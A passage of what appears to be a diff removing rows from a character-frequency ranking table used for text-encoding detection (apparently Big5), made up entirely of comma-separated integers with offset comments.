-5489,5490,5491,5492,5493,5494,5495,5496,5497,5498,5499,5500,5501,5502,5503,5504, # 800 -5505,5506,5507,5508,5509,5510,5511,5512,5513,5514,5515,5516,5517,5518,5519,5520, # 816 -5521,5522,5523,5524,5525,5526,5527,5528,5529,5530,5531,5532,5533,5534,5535,5536, # 832 -5537,5538,5539,5540,5541,5542,5543,5544,5545,5546,5547,5548,5549,5550,5551,5552, # 848 -5553,5554,5555,5556,5557,5558,5559,5560,5561,5562,5563,5564,5565,5566,5567,5568, # 864 -5569,5570,5571,5572,5573,5574,5575,5576,5577,5578,5579,5580,5581,5582,5583,5584, # 880 -5585,5586,5587,5588,5589,5590,5591,5592,5593,5594,5595,5596,5597,5598,5599,5600, # 896 -5601,5602,5603,5604,5605,5606,5607,5608,5609,5610,5611,5612,5613,5614,5615,5616, # 912 -5617,5618,5619,5620,5621,5622,5623,5624,5625,5626,5627,5628,5629,5630,5631,5632, # 928 -5633,5634,5635,5636,5637,5638,5639,5640,5641,5642,5643,5644,5645,5646,5647,5648, # 944 -5649,5650,5651,5652,5653,5654,5655,5656,5657,5658,5659,5660,5661,5662,5663,5664, # 960 -5665,5666,5667,5668,5669,5670,5671,5672,5673,5674,5675,5676,5677,5678,5679,5680, # 976 -5681,5682,5683,5684,5685,5686,5687,5688,5689,5690,5691,5692,5693,5694,5695,5696, # 992 -5697,5698,5699,5700,5701,5702,5703,5704,5705,5706,5707,5708,5709,5710,5711,5712, # 1008 -5713,5714,5715,5716,5717,5718,5719,5720,5721,5722,5723,5724,5725,5726,5727,5728, # 1024 -5729,5730,5731,5732,5733,5734,5735,5736,5737,5738,5739,5740,5741,5742,5743,5744, # 1040 -5745,5746,5747,5748,5749,5750,5751,5752,5753,5754,5755,5756,5757,5758,5759,5760, # 1056 -5761,5762,5763,5764,5765,5766,5767,5768,5769,5770,5771,5772,5773,5774,5775,5776, # 1072 -5777,5778,5779,5780,5781,5782,5783,5784,5785,5786,5787,5788,5789,5790,5791,5792, # 1088 -5793,5794,5795,5796,5797,5798,5799,5800,5801,5802,5803,5804,5805,5806,5807,5808, # 1104 -5809,5810,5811,5812,5813,5814,5815,5816,5817,5818,5819,5820,5821,5822,5823,5824, # 1120 -5825,5826,5827,5828,5829,5830,5831,5832,5833,5834,5835,5836,5837,5838,5839,5840, # 1136 -5841,5842,5843,5844,5845,5846,5847,5848,5849,5850,5851,5852,5853,5854,5855,5856, # 1152 -5857,5858,5859,5860,5861,5862,5863,5864,5865,5866,5867,5868,5869,5870,5871,5872, # 1168 -5873,5874,5875,5876,5877,5878,5879,5880,5881,5882,5883,5884,5885,5886,5887,5888, # 1184 -5889,5890,5891,5892,5893,5894,5895,5896,5897,5898,5899,5900,5901,5902,5903,5904, # 1200 -5905,5906,5907,5908,5909,5910,5911,5912,5913,5914,5915,5916,5917,5918,5919,5920, # 1216 -5921,5922,5923,5924,5925,5926,5927,5928,5929,5930,5931,5932,5933,5934,5935,5936, # 1232 -5937,5938,5939,5940,5941,5942,5943,5944,5945,5946,5947,5948,5949,5950,5951,5952, # 1248 -5953,5954,5955,5956,5957,5958,5959,5960,5961,5962,5963,5964,5965,5966,5967,5968, # 1264 -5969,5970,5971,5972,5973,5974,5975,5976,5977,5978,5979,5980,5981,5982,5983,5984, # 1280 -5985,5986,5987,5988,5989,5990,5991,5992,5993,5994,5995,5996,5997,5998,5999,6000, # 1296 -6001,6002,6003,6004,6005,6006,6007,6008,6009,6010,6011,6012,6013,6014,6015,6016, # 1312 -6017,6018,6019,6020,6021,6022,6023,6024,6025,6026,6027,6028,6029,6030,6031,6032, # 1328 -6033,6034,6035,6036,6037,6038,6039,6040,6041,6042,6043,6044,6045,6046,6047,6048, # 1344 -6049,6050,6051,6052,6053,6054,6055,6056,6057,6058,6059,6060,6061,6062,6063,6064, # 1360 -6065,6066,6067,6068,6069,6070,6071,6072,6073,6074,6075,6076,6077,6078,6079,6080, # 1376 -6081,6082,6083,6084,6085,6086,6087,6088,6089,6090,6091,6092,6093,6094,6095,6096, # 1392 -6097,6098,6099,6100,6101,6102,6103,6104,6105,6106,6107,6108,6109,6110,6111,6112, # 1408 -6113,6114,2044,2060,4621, 997,1235, 473,1186,4622, 920,3378,6115,6116, 379,1108, # 1424 -4313,2657,2735,3934,6117,3809, 636,3233, 573,1026,3693,3435,2974,3300,2298,4105, # 1440 - 854,2937,2463, 393,2581,2417, 539, 752,1280,2750,2480, 140,1161, 440, 708,1569, # 1456 - 665,2497,1746,1291,1523,3000, 164,1603, 847,1331, 537,1997, 486, 508,1693,2418, # 1472 -1970,2227, 878,1220, 299,1030, 969, 652,2751, 624,1137,3301,2619, 65,3302,2045, # 1488 -1761,1859,3120,1930,3694,3516, 663,1767, 852, 835,3695, 269, 767,2826,2339,1305, # 1504 - 896,1150, 770,1616,6118, 506,1502,2075,1012,2519, 775,2520,2975,2340,2938,4314, # 1520 -3028,2086,1224,1943,2286,6119,3072,4315,2240,1273,1987,3935,1557, 175, 597, 985, # 1536 -3517,2419,2521,1416,3029, 585, 938,1931,1007,1052,1932,1685,6120,3379,4316,4623, # 1552 - 804, 599,3121,1333,2128,2539,1159,1554,2032,3810, 687,2033,2904, 952, 675,1467, # 1568 -3436,6121,2241,1096,1786,2440,1543,1924, 980,1813,2228, 781,2692,1879, 728,1918, # 1584 -3696,4624, 548,1950,4625,1809,1088,1356,3303,2522,1944, 502, 972, 373, 513,2827, # 1600 - 586,2377,2391,1003,1976,1631,6122,2464,1084, 648,1776,4626,2141, 324, 962,2012, # 1616 -2177,2076,1384, 742,2178,1448,1173,1810, 222, 102, 301, 445, 125,2420, 662,2498, # 1632 - 277, 200,1476,1165,1068, 224,2562,1378,1446, 450,1880, 659, 791, 582,4627,2939, # 1648 -3936,1516,1274, 555,2099,3697,1020,1389,1526,3380,1762,1723,1787,2229, 412,2114, # 1664 -1900,2392,3518, 512,2597, 427,1925,2341,3122,1653,1686,2465,2499, 697, 330, 273, # 1680 - 380,2162, 951, 832, 780, 991,1301,3073, 965,2270,3519, 668,2523,2636,1286, 535, # 1696 -1407, 518, 671, 957,2658,2378, 267, 611,2197,3030,6123, 248,2299, 967,1799,2356, # 1712 - 850,1418,3437,1876,1256,1480,2828,1718,6124,6125,1755,1664,2405,6126,4628,2879, # 1728 -2829, 499,2179, 676,4629, 557,2329,2214,2090, 325,3234, 464, 811,3001, 992,2342, # 1744 -2481,1232,1469, 303,2242, 466,1070,2163, 603,1777,2091,4630,2752,4631,2714, 322, # 1760 -2659,1964,1768, 481,2188,1463,2330,2857,3600,2092,3031,2421,4632,2318,2070,1849, # 1776 -2598,4633,1302,2254,1668,1701,2422,3811,2905,3032,3123,2046,4106,1763,1694,4634, # 1792 -1604, 943,1724,1454, 917, 868,2215,1169,2940, 552,1145,1800,1228,1823,1955, 316, # 1808 -1080,2510, 361,1807,2830,4107,2660,3381,1346,1423,1134,4108,6127, 541,1263,1229, # 1824 -1148,2540, 545, 465,1833,2880,3438,1901,3074,2482, 816,3937, 713,1788,2500, 122, # 1840 -1575, 195,1451,2501,1111,6128, 859, 374,1225,2243,2483,4317, 390,1033,3439,3075, # 1856 -2524,1687, 266, 793,1440,2599, 946, 779, 802, 507, 897,1081, 528,2189,1292, 711, # 1872 -1866,1725,1167,1640, 753, 398,2661,1053, 246, 348,4318, 137,1024,3440,1600,2077, # 1888 -2129, 825,4319, 698, 238, 521, 187,2300,1157,2423,1641,1605,1464,1610,1097,2541, # 1904 -1260,1436, 759,2255,1814,2150, 705,3235, 409,2563,3304, 561,3033,2005,2564, 726, # 1920 -1956,2343,3698,4109, 949,3812,3813,3520,1669, 653,1379,2525, 881,2198, 632,2256, # 1936 -1027, 778,1074, 733,1957, 514,1481,2466, 554,2180, 702,3938,1606,1017,1398,6129, # 1952 -1380,3521, 921, 993,1313, 594, 449,1489,1617,1166, 768,1426,1360, 495,1794,3601, # 1968 -1177,3602,1170,4320,2344, 476, 425,3167,4635,3168,1424, 401,2662,1171,3382,1998, # 1984 -1089,4110, 477,3169, 474,6130,1909, 596,2831,1842, 494, 693,1051,1028,1207,3076, # 2000 - 606,2115, 727,2790,1473,1115, 743,3522, 630, 805,1532,4321,2021, 366,1057, 838, # 2016 - 684,1114,2142,4322,2050,1492,1892,1808,2271,3814,2424,1971,1447,1373,3305,1090, # 2032 -1536,3939,3523,3306,1455,2199, 336, 369,2331,1035, 584,2393, 902, 718,2600,6131, # 2048 -2753, 463,2151,1149,1611,2467, 715,1308,3124,1268, 343,1413,3236,1517,1347,2663, # 2064 -2093,3940,2022,1131,1553,2100,2941,1427,3441,2942,1323,2484,6132,1980, 872,2368, # 2080 -2441,2943, 320,2369,2116,1082, 679,1933,3941,2791,3815, 625,1143,2023, 422,2200, # 2096 -3816,6133, 730,1695, 356,2257,1626,2301,2858,2637,1627,1778, 937, 883,2906,2693, # 2112 -3002,1769,1086, 400,1063,1325,3307,2792,4111,3077, 456,2345,1046, 747,6134,1524, # 2128 - 884,1094,3383,1474,2164,1059, 974,1688,2181,2258,1047, 345,1665,1187, 358, 875, # 2144 -3170, 305, 660,3524,2190,1334,1135,3171,1540,1649,2542,1527, 927, 968,2793, 885, # 2160 -1972,1850, 482, 500,2638,1218,1109,1085,2543,1654,2034, 876, 78,2287,1482,1277, # 2176 - 861,1675,1083,1779, 724,2754, 454, 397,1132,1612,2332, 893, 672,1237, 257,2259, # 2192 -2370, 135,3384, 337,2244, 547, 352, 340, 709,2485,1400, 788,1138,2511, 540, 772, # 2208 -1682,2260,2272,2544,2013,1843,1902,4636,1999,1562,2288,4637,2201,1403,1533, 407, # 2224 - 576,3308,1254,2071, 978,3385, 170, 136,1201,3125,2664,3172,2394, 213, 912, 873, # 2240 -3603,1713,2202, 699,3604,3699, 813,3442, 493, 531,1054, 468,2907,1483, 304, 281, # 2256 -4112,1726,1252,2094, 339,2319,2130,2639, 756,1563,2944, 748, 571,2976,1588,2425, # 2272 -2715,1851,1460,2426,1528,1392,1973,3237, 288,3309, 685,3386, 296, 892,2716,2216, # 2288 -1570,2245, 722,1747,2217, 905,3238,1103,6135,1893,1441,1965, 251,1805,2371,3700, # 2304 -2601,1919,1078, 75,2182,1509,1592,1270,2640,4638,2152,6136,3310,3817, 524, 706, # 2320 -1075, 292,3818,1756,2602, 317, 98,3173,3605,3525,1844,2218,3819,2502, 814, 567, # 2336 - 385,2908,1534,6137, 534,1642,3239, 797,6138,1670,1529, 953,4323, 188,1071, 538, # 2352 - 178, 729,3240,2109,1226,1374,2000,2357,2977, 731,2468,1116,2014,2051,6139,1261, # 2368 -1593, 803,2859,2736,3443, 556, 682, 823,1541,6140,1369,2289,1706,2794, 845, 462, # 2384 -2603,2665,1361, 387, 162,2358,1740, 739,1770,1720,1304,1401,3241,1049, 627,1571, # 2400 -2427,3526,1877,3942,1852,1500, 431,1910,1503, 677, 297,2795, 286,1433,1038,1198, # 2416 -2290,1133,1596,4113,4639,2469,1510,1484,3943,6141,2442, 108, 712,4640,2372, 866, # 2432 -3701,2755,3242,1348, 834,1945,1408,3527,2395,3243,1811, 824, 994,1179,2110,1548, # 2448 -1453, 790,3003, 690,4324,4325,2832,2909,3820,1860,3821, 225,1748, 310, 346,1780, # 2464 -2470, 821,1993,2717,2796, 828, 877,3528,2860,2471,1702,2165,2910,2486,1789, 453, # 2480 - 359,2291,1676, 73,1164,1461,1127,3311, 421, 604, 314,1037, 589, 116,2487, 737, # 2496 - 837,1180, 111, 244, 735,6142,2261,1861,1362, 986, 523, 418, 581,2666,3822, 103, # 2512 - 855, 503,1414,1867,2488,1091, 657,1597, 979, 605,1316,4641,1021,2443,2078,2001, # 2528 -1209, 96, 587,2166,1032, 260,1072,2153, 173, 94, 226,3244, 819,2006,4642,4114, # 2544 -2203, 231,1744, 782, 97,2667, 786,3387, 887, 391, 442,2219,4326,1425,6143,2694, # 2560 - 633,1544,1202, 483,2015, 592,2052,1958,2472,1655, 419, 129,4327,3444,3312,1714, # 2576 -1257,3078,4328,1518,1098, 865,1310,1019,1885,1512,1734, 469,2444, 148, 773, 436, # 2592 -1815,1868,1128,1055,4329,1245,2756,3445,2154,1934,1039,4643, 579,1238, 932,2320, # 2608 - 353, 205, 801, 115,2428, 944,2321,1881, 399,2565,1211, 678, 766,3944, 335,2101, # 2624 -1459,1781,1402,3945,2737,2131,1010, 844, 981,1326,1013, 550,1816,1545,2620,1335, # 2640 -1008, 371,2881, 936,1419,1613,3529,1456,1395,2273,1834,2604,1317,2738,2503, 416, # 2656 -1643,4330, 806,1126, 229, 591,3946,1314,1981,1576,1837,1666, 347,1790, 977,3313, # 2672 - 764,2861,1853, 688,2429,1920,1462, 77, 595, 415,2002,3034, 798,1192,4115,6144, # 2688 -2978,4331,3035,2695,2582,2072,2566, 430,2430,1727, 842,1396,3947,3702, 613, 377, # 2704 - 278, 236,1417,3388,3314,3174, 757,1869, 107,3530,6145,1194, 623,2262, 207,1253, # 2720 -2167,3446,3948, 492,1117,1935, 536,1838,2757,1246,4332, 696,2095,2406,1393,1572, # 2736 -3175,1782, 583, 190, 253,1390,2230, 830,3126,3389, 934,3245,1703,1749,2979,1870, # 2752 -2545,1656,2204, 869,2346,4116,3176,1817, 496,1764,4644, 942,1504, 404,1903,1122, # 2768 -1580,3606,2945,1022, 515, 372,1735, 955,2431,3036,6146,2797,1110,2302,2798, 617, # 2784 -6147, 441, 762,1771,3447,3607,3608,1904, 840,3037, 86, 939,1385, 572,1370,2445, # 2800 -1336, 114,3703, 898, 294, 203,3315, 703,1583,2274, 429, 961,4333,1854,1951,3390, # 2816 -2373,3704,4334,1318,1381, 966,1911,2322,1006,1155, 309, 989, 458,2718,1795,1372, # 2832 -1203, 252,1689,1363,3177, 517,1936, 168,1490, 562, 193,3823,1042,4117,1835, 551, # 2848 - 470,4645, 395, 489,3448,1871,1465,2583,2641, 417,1493, 279,1295, 511,1236,1119, # 2864 - 72,1231,1982,1812,3004, 871,1564, 984,3449,1667,2696,2096,4646,2347,2833,1673, # 2880 -3609, 695,3246,2668, 807,1183,4647, 890, 388,2333,1801,1457,2911,1765,1477,1031, # 2896 -3316,3317,1278,3391,2799,2292,2526, 163,3450,4335,2669,1404,1802,6148,2323,2407, # 2912 -1584,1728,1494,1824,1269, 298, 909,3318,1034,1632, 375, 776,1683,2061, 291, 210, # 2928 -1123, 809,1249,1002,2642,3038, 206,1011,2132, 144, 975, 882,1565, 342, 667, 754, # 2944 -1442,2143,1299,2303,2062, 447, 626,2205,1221,2739,2912,1144,1214,2206,2584, 760, # 2960 -1715, 614, 950,1281,2670,2621, 810, 577,1287,2546,4648, 242,2168, 250,2643, 691, # 2976 - 123,2644, 647, 313,1029, 689,1357,2946,1650, 216, 771,1339,1306, 808,2063, 549, # 2992 - 913,1371,2913,2914,6149,1466,1092,1174,1196,1311,2605,2396,1783,1796,3079, 406, # 3008 -2671,2117,3949,4649, 487,1825,2220,6150,2915, 448,2348,1073,6151,2397,1707, 130, # 3024 - 900,1598, 329, 176,1959,2527,1620,6152,2275,4336,3319,1983,2191,3705,3610,2155, # 3040 -3706,1912,1513,1614,6153,1988, 646, 392,2304,1589,3320,3039,1826,1239,1352,1340, # 3056 -2916, 505,2567,1709,1437,2408,2547, 906,6154,2672, 384,1458,1594,1100,1329, 710, # 3072 - 423,3531,2064,2231,2622,1989,2673,1087,1882, 333, 841,3005,1296,2882,2379, 580, # 3088 -1937,1827,1293,2585, 601, 574, 249,1772,4118,2079,1120, 645, 901,1176,1690, 795, # 3104 -2207, 478,1434, 516,1190,1530, 761,2080, 930,1264, 355, 435,1552, 644,1791, 987, # 3120 - 220,1364,1163,1121,1538, 306,2169,1327,1222, 546,2645, 218, 241, 610,1704,3321, # 3136 -1984,1839,1966,2528, 451,6155,2586,3707,2568, 907,3178, 254,2947, 186,1845,4650, # 3152 - 745, 432,1757, 428,1633, 888,2246,2221,2489,3611,2118,1258,1265, 956,3127,1784, # 3168 -4337,2490, 319, 510, 119, 457,3612, 274,2035,2007,4651,1409,3128, 970,2758, 590, # 3184 -2800, 661,2247,4652,2008,3950,1420,1549,3080,3322,3951,1651,1375,2111, 485,2491, # 3200 -1429,1156,6156,2548,2183,1495, 831,1840,2529,2446, 501,1657, 307,1894,3247,1341, # 3216 - 666, 899,2156,1539,2549,1559, 886, 349,2208,3081,2305,1736,3824,2170,2759,1014, # 3232 -1913,1386, 542,1397,2948, 490, 368, 716, 362, 159, 282,2569,1129,1658,1288,1750, # 3248 -2674, 276, 649,2016, 751,1496, 658,1818,1284,1862,2209,2087,2512,3451, 622,2834, # 3264 - 376, 117,1060,2053,1208,1721,1101,1443, 247,1250,3179,1792,3952,2760,2398,3953, # 3280 -6157,2144,3708, 446,2432,1151,2570,3452,2447,2761,2835,1210,2448,3082, 424,2222, # 3296 -1251,2449,2119,2836, 504,1581,4338, 602, 817, 857,3825,2349,2306, 357,3826,1470, # 3312 -1883,2883, 255, 958, 929,2917,3248, 302,4653,1050,1271,1751,2307,1952,1430,2697, # 3328 -2719,2359, 354,3180, 777, 158,2036,4339,1659,4340,4654,2308,2949,2248,1146,2232, # 3344 -3532,2720,1696,2623,3827,6158,3129,1550,2698,1485,1297,1428, 637, 931,2721,2145, # 3360 - 914,2550,2587, 81,2450, 612, 827,2646,1242,4655,1118,2884, 472,1855,3181,3533, # 3376 -3534, 569,1353,2699,1244,1758,2588,4119,2009,2762,2171,3709,1312,1531,6159,1152, # 3392 -1938, 134,1830, 471,3710,2276,1112,1535,3323,3453,3535, 982,1337,2950, 488, 826, # 3408 - 674,1058,1628,4120,2017, 522,2399, 211, 568,1367,3454, 350, 293,1872,1139,3249, # 3424 -1399,1946,3006,1300,2360,3324, 588, 736,6160,2606, 744, 669,3536,3828,6161,1358, # 3440 - 199, 723, 848, 933, 851,1939,1505,1514,1338,1618,1831,4656,1634,3613, 443,2740, # 3456 -3829, 717,1947, 491,1914,6162,2551,1542,4121,1025,6163,1099,1223, 198,3040,2722, # 3472 - 370, 410,1905,2589, 998,1248,3182,2380, 519,1449,4122,1710, 947, 928,1153,4341, # 3488 -2277, 344,2624,1511, 615, 105, 161,1212,1076,1960,3130,2054,1926,1175,1906,2473, # 3504 - 414,1873,2801,6164,2309, 315,1319,3325, 318,2018,2146,2157, 963, 631, 223,4342, # 3520 -4343,2675, 479,3711,1197,2625,3712,2676,2361,6165,4344,4123,6166,2451,3183,1886, # 3536 -2184,1674,1330,1711,1635,1506, 799, 219,3250,3083,3954,1677,3713,3326,2081,3614, # 3552 -1652,2073,4657,1147,3041,1752, 643,1961, 147,1974,3955,6167,1716,2037, 918,3007, # 3568 -1994, 120,1537, 118, 609,3184,4345, 740,3455,1219, 332,1615,3830,6168,1621,2980, # 3584 -1582, 783, 212, 553,2350,3714,1349,2433,2082,4124, 889,6169,2310,1275,1410, 973, # 3600 - 166,1320,3456,1797,1215,3185,2885,1846,2590,2763,4658, 629, 822,3008, 763, 940, # 3616 -1990,2862, 439,2409,1566,1240,1622, 926,1282,1907,2764, 654,2210,1607, 327,1130, # 3632 -3956,1678,1623,6170,2434,2192, 686, 608,3831,3715, 903,3957,3042,6171,2741,1522, # 3648 -1915,1105,1555,2552,1359, 323,3251,4346,3457, 738,1354,2553,2311,2334,1828,2003, # 3664 -3832,1753,2351,1227,6172,1887,4125,1478,6173,2410,1874,1712,1847, 520,1204,2607, # 3680 - 264,4659, 836,2677,2102, 600,4660,3833,2278,3084,6174,4347,3615,1342, 640, 532, # 3696 - 543,2608,1888,2400,2591,1009,4348,1497, 341,1737,3616,2723,1394, 529,3252,1321, # 3712 - 983,4661,1515,2120, 971,2592, 924, 287,1662,3186,4349,2700,4350,1519, 908,1948, # 3728 -2452, 156, 796,1629,1486,2223,2055, 694,4126,1259,1036,3392,1213,2249,2742,1889, # 3744 -1230,3958,1015, 910, 408, 559,3617,4662, 746, 725, 935,4663,3959,3009,1289, 563, # 3760 - 867,4664,3960,1567,2981,2038,2626, 988,2263,2381,4351, 143,2374, 704,1895,6175, # 3776 -1188,3716,2088, 673,3085,2362,4352, 484,1608,1921,2765,2918, 215, 904,3618,3537, # 3792 - 894, 509, 976,3043,2701,3961,4353,2837,2982, 498,6176,6177,1102,3538,1332,3393, # 3808 -1487,1636,1637, 233, 245,3962, 383, 650, 995,3044, 460,1520,1206,2352, 749,3327, # 3824 - 530, 700, 389,1438,1560,1773,3963,2264, 719,2951,2724,3834, 870,1832,1644,1000, # 3840 - 839,2474,3717, 197,1630,3394, 365,2886,3964,1285,2133, 734, 922, 818,1106, 732, # 3856 - 480,2083,1774,3458, 923,2279,1350, 221,3086, 85,2233,2234,3835,1585,3010,2147, # 3872 -1387,1705,2382,1619,2475, 133, 239,2802,1991,1016,2084,2383, 411,2838,1113, 651, # 3888 -1985,1160,3328, 990,1863,3087,1048,1276,2647, 265,2627,1599,3253,2056, 150, 638, # 3904 -2019, 656, 853, 326,1479, 680,1439,4354,1001,1759, 413,3459,3395,2492,1431, 459, # 3920 -4355,1125,3329,2265,1953,1450,2065,2863, 849, 351,2678,3131,3254,3255,1104,1577, # 3936 - 227,1351,1645,2453,2193,1421,2887, 812,2121, 634, 95,2435, 201,2312,4665,1646, # 3952 -1671,2743,1601,2554,2702,2648,2280,1315,1366,2089,3132,1573,3718,3965,1729,1189, # 3968 - 328,2679,1077,1940,1136, 558,1283, 964,1195, 621,2074,1199,1743,3460,3619,1896, # 3984 -1916,1890,3836,2952,1154,2112,1064, 862, 378,3011,2066,2113,2803,1568,2839,6178, # 4000 -3088,2919,1941,1660,2004,1992,2194, 142, 707,1590,1708,1624,1922,1023,1836,1233, # 4016 -1004,2313, 789, 741,3620,6179,1609,2411,1200,4127,3719,3720,4666,2057,3721, 593, # 4032 -2840, 367,2920,1878,6180,3461,1521, 628,1168, 692,2211,2649, 300, 720,2067,2571, # 4048 -2953,3396, 959,2504,3966,3539,3462,1977, 701,6181, 954,1043, 800, 681, 183,3722, # 4064 -1803,1730,3540,4128,2103, 815,2314, 174, 467, 230,2454,1093,2134, 755,3541,3397, # 4080 -1141,1162,6182,1738,2039, 270,3256,2513,1005,1647,2185,3837, 858,1679,1897,1719, # 4096 -2954,2324,1806, 402, 670, 167,4129,1498,2158,2104, 750,6183, 915, 189,1680,1551, # 4112 - 455,4356,1501,2455, 405,1095,2955, 338,1586,1266,1819, 570, 641,1324, 237,1556, # 4128 -2650,1388,3723,6184,1368,2384,1343,1978,3089,2436, 879,3724, 792,1191, 758,3012, # 4144 -1411,2135,1322,4357, 240,4667,1848,3725,1574,6185, 420,3045,1546,1391, 714,4358, # 4160 -1967, 941,1864, 863, 664, 426, 560,1731,2680,1785,2864,1949,2363, 403,3330,1415, # 4176 -1279,2136,1697,2335, 204, 721,2097,3838, 90,6186,2085,2505, 191,3967, 124,2148, # 4192 -1376,1798,1178,1107,1898,1405, 860,4359,1243,1272,2375,2983,1558,2456,1638, 113, # 4208 -3621, 578,1923,2609, 880, 386,4130, 784,2186,2266,1422,2956,2172,1722, 497, 263, # 4224 -2514,1267,2412,2610, 177,2703,3542, 774,1927,1344, 616,1432,1595,1018, 172,4360, # 4240 -2325, 911,4361, 438,1468,3622, 794,3968,2024,2173,1681,1829,2957, 945, 895,3090, # 4256 - 575,2212,2476, 475,2401,2681, 785,2744,1745,2293,2555,1975,3133,2865, 394,4668, # 4272 -3839, 635,4131, 639, 202,1507,2195,2766,1345,1435,2572,3726,1908,1184,1181,2457, # 4288 -3727,3134,4362, 843,2611, 437, 916,4669, 234, 769,1884,3046,3047,3623, 833,6187, # 4304 -1639,2250,2402,1355,1185,2010,2047, 999, 525,1732,1290,1488,2612, 948,1578,3728, # 4320 -2413,2477,1216,2725,2159, 334,3840,1328,3624,2921,1525,4132, 564,1056, 891,4363, # 4336 -1444,1698,2385,2251,3729,1365,2281,2235,1717,6188, 864,3841,2515, 444, 527,2767, # 4352 -2922,3625, 544, 461,6189, 566, 209,2437,3398,2098,1065,2068,3331,3626,3257,2137, # 4368 #last 512 -#Everything below is of no interest for detection purpose -2138,2122,3730,2888,1995,1820,1044,6190,6191,6192,6193,6194,6195,6196,6197,6198, # 4384 -6199,6200,6201,6202,6203,6204,6205,4670,6206,6207,6208,6209,6210,6211,6212,6213, # 4400 -6214,6215,6216,6217,6218,6219,6220,6221,6222,6223,6224,6225,6226,6227,6228,6229, # 4416 -6230,6231,6232,6233,6234,6235,6236,6237,3187,6238,6239,3969,6240,6241,6242,6243, # 4432 -6244,4671,6245,6246,4672,6247,6248,4133,6249,6250,4364,6251,2923,2556,2613,4673, # 4448 -4365,3970,6252,6253,6254,6255,4674,6256,6257,6258,2768,2353,4366,4675,4676,3188, # 4464 -4367,3463,6259,4134,4677,4678,6260,2267,6261,3842,3332,4368,3543,6262,6263,6264, # 4480 -3013,1954,1928,4135,4679,6265,6266,2478,3091,6267,4680,4369,6268,6269,1699,6270, # 4496 -3544,4136,4681,6271,4137,6272,4370,2804,6273,6274,2593,3971,3972,4682,6275,2236, # 4512 -4683,6276,6277,4684,6278,6279,4138,3973,4685,6280,6281,3258,6282,6283,6284,6285, # 4528 -3974,4686,2841,3975,6286,6287,3545,6288,6289,4139,4687,4140,6290,4141,6291,4142, # 4544 -6292,6293,3333,6294,6295,6296,4371,6297,3399,6298,6299,4372,3976,6300,6301,6302, # 4560 -4373,6303,6304,3843,3731,6305,4688,4374,6306,6307,3259,2294,6308,3732,2530,4143, # 4576 -6309,4689,6310,6311,6312,3048,6313,6314,4690,3733,2237,6315,6316,2282,3334,6317, # 4592 -6318,3844,6319,6320,4691,6321,3400,4692,6322,4693,6323,3049,6324,4375,6325,3977, # 4608 -6326,6327,6328,3546,6329,4694,3335,6330,4695,4696,6331,6332,6333,6334,4376,3978, # 4624 -6335,4697,3979,4144,6336,3980,4698,6337,6338,6339,6340,6341,4699,4700,4701,6342, # 4640 -6343,4702,6344,6345,4703,6346,6347,4704,6348,4705,4706,3135,6349,4707,6350,4708, # 4656 -6351,4377,6352,4709,3734,4145,6353,2506,4710,3189,6354,3050,4711,3981,6355,3547, # 4672 -3014,4146,4378,3735,2651,3845,3260,3136,2224,1986,6356,3401,6357,4712,2594,3627, # 4688 -3137,2573,3736,3982,4713,3628,4714,4715,2682,3629,4716,6358,3630,4379,3631,6359, # 4704 -6360,6361,3983,6362,6363,6364,6365,4147,3846,4717,6366,6367,3737,2842,6368,4718, # 4720 -2628,6369,3261,6370,2386,6371,6372,3738,3984,4719,3464,4720,3402,6373,2924,3336, # 4736 -4148,2866,6374,2805,3262,4380,2704,2069,2531,3138,2806,2984,6375,2769,6376,4721, # 4752 -4722,3403,6377,6378,3548,6379,6380,2705,3092,1979,4149,2629,3337,2889,6381,3338, # 4768 -4150,2557,3339,4381,6382,3190,3263,3739,6383,4151,4723,4152,2558,2574,3404,3191, # 4784 -6384,6385,4153,6386,4724,4382,6387,6388,4383,6389,6390,4154,6391,4725,3985,6392, # 4800 -3847,4155,6393,6394,6395,6396,6397,3465,6398,4384,6399,6400,6401,6402,6403,6404, # 4816 -4156,6405,6406,6407,6408,2123,6409,6410,2326,3192,4726,6411,6412,6413,6414,4385, # 4832 -4157,6415,6416,4158,6417,3093,3848,6418,3986,6419,6420,3849,6421,6422,6423,4159, # 4848 -6424,6425,4160,6426,3740,6427,6428,6429,6430,3987,6431,4727,6432,2238,6433,6434, # 4864 -4386,3988,6435,6436,3632,6437,6438,2843,6439,6440,6441,6442,3633,6443,2958,6444, # 4880 -6445,3466,6446,2364,4387,3850,6447,4388,2959,3340,6448,3851,6449,4728,6450,6451, # 4896 -3264,4729,6452,3193,6453,4389,4390,2706,3341,4730,6454,3139,6455,3194,6456,3051, # 4912 -2124,3852,1602,4391,4161,3853,1158,3854,4162,3989,4392,3990,4731,4732,4393,2040, # 4928 -4163,4394,3265,6457,2807,3467,3855,6458,6459,6460,3991,3468,4733,4734,6461,3140, # 4944 -2960,6462,4735,6463,6464,6465,6466,4736,4737,4738,4739,6467,6468,4164,2403,3856, # 4960 -6469,6470,2770,2844,6471,4740,6472,6473,6474,6475,6476,6477,6478,3195,6479,4741, # 4976 -4395,6480,2867,6481,4742,2808,6482,2493,4165,6483,6484,6485,6486,2295,4743,6487, # 4992 -6488,6489,3634,6490,6491,6492,6493,6494,6495,6496,2985,4744,6497,6498,4745,6499, # 5008 -6500,2925,3141,4166,6501,6502,4746,6503,6504,4747,6505,6506,6507,2890,6508,6509, # 5024 -6510,6511,6512,6513,6514,6515,6516,6517,6518,6519,3469,4167,6520,6521,6522,4748, # 5040 -4396,3741,4397,4749,4398,3342,2125,4750,6523,4751,4752,4753,3052,6524,2961,4168, # 5056 -6525,4754,6526,4755,4399,2926,4169,6527,3857,6528,4400,4170,6529,4171,6530,6531, # 5072 -2595,6532,6533,6534,6535,3635,6536,6537,6538,6539,6540,6541,6542,4756,6543,6544, # 5088 -6545,6546,6547,6548,4401,6549,6550,6551,6552,4402,3405,4757,4403,6553,6554,6555, # 5104 -4172,3742,6556,6557,6558,3992,3636,6559,6560,3053,2726,6561,3549,4173,3054,4404, # 5120 -6562,6563,3993,4405,3266,3550,2809,4406,6564,6565,6566,4758,4759,6567,3743,6568, # 5136 -4760,3744,4761,3470,6569,6570,6571,4407,6572,3745,4174,6573,4175,2810,4176,3196, # 5152 -4762,6574,4177,6575,6576,2494,2891,3551,6577,6578,3471,6579,4408,6580,3015,3197, # 5168 -6581,3343,2532,3994,3858,6582,3094,3406,4409,6583,2892,4178,4763,4410,3016,4411, # 5184 -6584,3995,3142,3017,2683,6585,4179,6586,6587,4764,4412,6588,6589,4413,6590,2986, # 5200 -6591,2962,3552,6592,2963,3472,6593,6594,4180,4765,6595,6596,2225,3267,4414,6597, # 5216 